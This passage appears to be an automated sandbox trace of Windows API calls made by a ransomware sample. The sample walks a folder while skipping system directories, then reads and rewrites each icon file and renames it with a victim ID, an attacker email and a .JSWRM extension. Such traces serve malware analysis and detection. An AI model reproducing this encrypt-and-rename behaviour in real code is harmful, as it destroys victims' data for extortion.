lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0060.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0060.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0060.587] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x8f66, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="Setup.ico", cAlternateFileName="")) returned 1 [0060.587] lstrcmpiW (lpString1="Setup.ico", lpString2=".") returned 1 [0060.587] lstrcmpiW (lpString1="Setup.ico", lpString2="..") returned 1 [0060.587] lstrcmpiW (lpString1="Setup.ico", lpString2="...") returned 1 [0060.587] lstrcmpiW (lpString1="Setup.ico", lpString2="windows") returned -1 [0060.587] lstrcmpiW (lpString1="Setup.ico", lpString2="recovery") returned 1 [0060.587] lstrcmpiW (lpString1="Setup.ico", lpString2="perflogs") returned 1 [0060.587] lstrcmpiW (lpString1="Setup.ico", lpString2="documents and settings") returned 1 [0060.587] lstrcmpiW (lpString1="Setup.ico", lpString2="$RECYCLE.BIN") returned 1 [0060.587] lstrcmpiW (lpString1="Setup.ico", lpString2="system volume information") returned -1 [0060.587] lstrcmpiW (lpString1="Setup.ico", lpString2="msocache") returned 1 [0060.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0060.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Setup.ico", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0060.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Setup.ico", cchWideChar=9, lpMultiByteStr=0x345f610, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.ico", lpUsedDefaultChar=0x0) returned 9 [0060.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0060.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0060.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Setup.ico", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0060.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Setup.ico", cchWideChar=9, lpMultiByteStr=0x345f5e0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.ico", lpUsedDefaultChar=0x0) returned 9 [0060.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0060.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0060.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0060.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0060.588] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.588] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=36710) returned 1 [0060.588] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8f60) returned 0x2471a8 [0060.588] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x8f60, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x8f60, lpOverlapped=0x0) returned 1 [0060.592] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.592] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x8f60, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x8f60, lpOverlapped=0x0) returned 1 [0060.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0060.593] CloseHandle (hObject=0x3d4) returned 1 [0060.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0060.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0060.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0060.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0060.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0060.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0060.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0060.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0060.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.598] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), lpNewFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0060.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0060.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0060.598] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b5e7f00, ftCreationTime.dwHighDateTime=0x1ca927c, ftLastAccessTime.dwLowDateTime=0x5b5e7f00, ftLastAccessTime.dwHighDateTime=0x1ca927c, ftLastWriteTime.dwLowDateTime=0x5b5e7f00, ftLastWriteTime.dwHighDateTime=0x1ca927c, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="stop.ico", cAlternateFileName="")) returned 1 [0060.598] lstrcmpiW (lpString1="stop.ico", lpString2=".") returned 1 [0060.598] lstrcmpiW (lpString1="stop.ico", lpString2="..") returned 1 [0060.598] lstrcmpiW (lpString1="stop.ico", lpString2="...") returned 1 [0060.598] lstrcmpiW (lpString1="stop.ico", lpString2="windows") returned -1 [0060.598] lstrcmpiW (lpString1="stop.ico", lpString2="recovery") returned 1 [0060.598] lstrcmpiW (lpString1="stop.ico", lpString2="perflogs") returned 1 [0060.598] lstrcmpiW (lpString1="stop.ico", lpString2="documents and settings") returned 1 [0060.598] lstrcmpiW (lpString1="stop.ico", lpString2="$RECYCLE.BIN") returned 1 [0060.598] lstrcmpiW (lpString1="stop.ico", lpString2="system volume information") returned -1 [0060.598] lstrcmpiW (lpString1="stop.ico", lpString2="msocache") returned 1 [0060.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0060.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="stop.ico", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0060.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="stop.ico", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stop.ico", lpUsedDefaultChar=0x0) returned 8 [0060.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0060.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0060.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="stop.ico", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0060.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="stop.ico", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stop.ico", lpUsedDefaultChar=0x0) returned 8 [0060.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0060.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0060.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0060.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0060.599] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.599] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=10134) returned 1 [0060.599] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2790) returned 0x23dc88 [0060.599] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0x2790, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0x2790, lpOverlapped=0x0) returned 1 [0060.601] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.601] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0x2790, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0x2790, lpOverlapped=0x0) returned 1 [0060.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0060.602] CloseHandle (hObject=0x3d4) returned 1 [0060.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0060.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0060.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0060.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0060.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0060.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0060.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0060.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0060.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.603] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), lpNewFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0060.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0060.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0060.603] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="SysReqMet.ico", cAlternateFileName="SYSREQ~1.ICO")) returned 1 [0060.603] lstrcmpiW (lpString1="SysReqMet.ico", lpString2=".") returned 1 [0060.604] lstrcmpiW (lpString1="SysReqMet.ico", lpString2="..") returned 1 [0060.604] lstrcmpiW (lpString1="SysReqMet.ico", lpString2="...") returned 1 [0060.604] lstrcmpiW (lpString1="SysReqMet.ico", lpString2="windows") returned -1 [0060.604] lstrcmpiW (lpString1="SysReqMet.ico", lpString2="recovery") returned 1 [0060.604] lstrcmpiW (lpString1="SysReqMet.ico", lpString2="perflogs") returned 1 [0060.604] lstrcmpiW (lpString1="SysReqMet.ico", lpString2="documents and settings") returned 1 [0060.604] lstrcmpiW (lpString1="SysReqMet.ico", lpString2="$RECYCLE.BIN") returned 1 [0060.604] lstrcmpiW (lpString1="SysReqMet.ico", lpString2="system volume information") returned -1 [0060.604] lstrcmpiW (lpString1="SysReqMet.ico", lpString2="msocache") returned 1 [0060.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0060.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SysReqMet.ico", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0060.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SysReqMet.ico", cchWideChar=13, lpMultiByteStr=0x345f610, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SysReqMet.ico", lpUsedDefaultChar=0x0) returned 13 [0060.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0060.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0060.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SysReqMet.ico", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0060.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SysReqMet.ico", cchWideChar=13, lpMultiByteStr=0x345f5e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SysReqMet.ico", lpUsedDefaultChar=0x0) returned 13 [0060.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0060.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0060.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0060.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0060.604] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.604] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=1150) returned 1 [0060.604] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x470) returned 0x203550 [0060.604] ReadFile (in: hFile=0x3d4, lpBuffer=0x203550, nNumberOfBytesToRead=0x470, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345f2d4*=0x470, lpOverlapped=0x0) returned 1 [0060.606] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.606] WriteFile (in: hFile=0x3d4, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x470, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345f2d0*=0x470, lpOverlapped=0x0) returned 1 [0060.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0060.606] CloseHandle (hObject=0x3d4) returned 1 [0060.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0060.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0060.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0060.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0060.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2173b0 [0060.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0060.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0060.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2173b0 | out: hHeap=0x1e0000) returned 1 [0060.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.607] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), lpNewFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0060.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0060.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0060.608] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="SysReqNotMet.ico", cAlternateFileName="SYSREQ~2.ICO")) returned 1 [0060.608] lstrcmpiW (lpString1="SysReqNotMet.ico", lpString2=".") returned 1 [0060.608] lstrcmpiW (lpString1="SysReqNotMet.ico", lpString2="..") returned 1 [0060.608] lstrcmpiW (lpString1="SysReqNotMet.ico", lpString2="...") returned 1 [0060.608] lstrcmpiW (lpString1="SysReqNotMet.ico", lpString2="windows") returned -1 [0060.608] lstrcmpiW (lpString1="SysReqNotMet.ico", lpString2="recovery") returned 1 [0060.608] lstrcmpiW (lpString1="SysReqNotMet.ico", lpString2="perflogs") returned 1 [0060.608] lstrcmpiW (lpString1="SysReqNotMet.ico", lpString2="documents and settings") returned 1 [0060.608] lstrcmpiW (lpString1="SysReqNotMet.ico", lpString2="$RECYCLE.BIN") returned 1 [0060.608] lstrcmpiW (lpString1="SysReqNotMet.ico", lpString2="system volume information") returned -1 [0060.608] lstrcmpiW (lpString1="SysReqNotMet.ico", lpString2="msocache") returned 1 [0060.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SysReqNotMet.ico", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, 